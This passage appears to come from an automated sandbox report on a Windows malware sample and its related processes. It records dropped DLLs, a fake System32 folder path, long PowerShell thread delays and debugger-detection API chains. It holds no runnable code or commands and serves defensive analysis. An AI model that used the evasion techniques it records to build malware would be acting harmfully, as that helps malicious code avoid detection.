    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6418Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3361Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7285
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2371
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7849
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1680
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8087
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 963
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7750
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 487
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7768
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1725
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7910
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1550
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8123
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1391
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7423
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 969
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7503
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1668
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6538
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3156
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7013
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2590
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8674
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 854
    Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\ucrtbased.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeDropped PE file which has not been started: C:\Users\user\Desktop\prnttemp.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeAPI coverage: 6.5 %
    Source: C:\Windows\System32\svchost.exeAPI coverage: 1.1 %
    Source: C:\Windows\System32\timeout.exe TID: 6756Thread sleep count: 84 > 30Jump to behavior
    Source: C:\Windows\System32\timeout.exe TID: 5324Thread sleep count: 84 > 30Jump to behavior
    Source: C:\Windows\System32\timeout.exe TID: 2360Thread sleep count: 89 > 30Jump to behavior
    Source: C:\Windows\System32\timeout.exe TID: 2780Thread sleep count: 85 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296Thread sleep count: 6418 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296Thread sleep count: 3361 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep time: -4611686018427385s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1816Thread sleep count: 7285 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232Thread sleep count: 2371 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1084Thread sleep time: -7378697629483816s >= -30000s
    Source: C:\Windows\System32\svchost.exe TID: 5648Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep count: 7849 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816Thread sleep count: 1680 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\console_zero.exe TID: 3348Thread sleep time: -46000s >= -30000s
    Source: C:\Windows\System32\timeout.exe TID: 6396Thread sleep count: 111 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep count: 8087 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep count: 963 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6692Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608Thread sleep count: 7750 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1716Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep count: 487 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3288Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\console_zero.exe TID: 6108Thread sleep time: -46000s >= -30000s
    Source: C:\Windows\System32\timeout.exe TID: 980Thread sleep count: 130 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep count: 7768 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3008Thread sleep count: 1725 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep count: 7910 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep count: 1550 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3528Thread sleep count: 8123 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep count: 1391 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1520Thread sleep count: 7423 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1520Thread sleep count: 969 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6188Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232Thread sleep count: 7503 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1816Thread sleep count: 1668 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3372Thread sleep count: 6538 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4352Thread sleep count: 3156 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1788Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep count: 7013 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep count: 2590 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -8301034833169293s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep count: 8674 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep count: 854 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h55_2_64946F50
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF712785E64 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF712785E64
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABFD2A8 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6CABFD2A8
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D3A450 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,55_2_00007FF8A7D3A450
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D3A30C FindClose,FindFirstFileExW,GetLastError,55_2_00007FF8A7D3A30C
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 46000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 46000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: curlapp64.exe, 0000000B.00000003.2670488283.000002552EEB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
    Source: svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: prnttemp.dll.5.drBinary or memory string: I;~HGFs
    Source: curlapp64.exe, 00000005.00000003.2494142253.0000022DE26E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
    Source: curlapp64.exe, 00000008.00000003.2588031470.0000021656B4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Found API chain indicative of debugger detection
    Source: C:\Windows\System32\svchost.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF7127743FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7127743FC
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A934FE30 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,QueryPerformanceFrequency,5_2_00007FF8A934FE30
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF712789F50 GetProcessHeap,0_2_00007FF712789F50
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF7127743FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7127743FC
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF712774050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF712774050
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF7127745DC SetUnhandledExceptionFilter,0_2_00007FF7127745DC
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71277AD2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF71277AD2C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABE4AFC SetUnhandledExceptionFilter,5_2_00007FF6CABE4AFC
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABE491C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6CABE491C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABF158C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6CABF158C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABE4570 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF6CABE4570
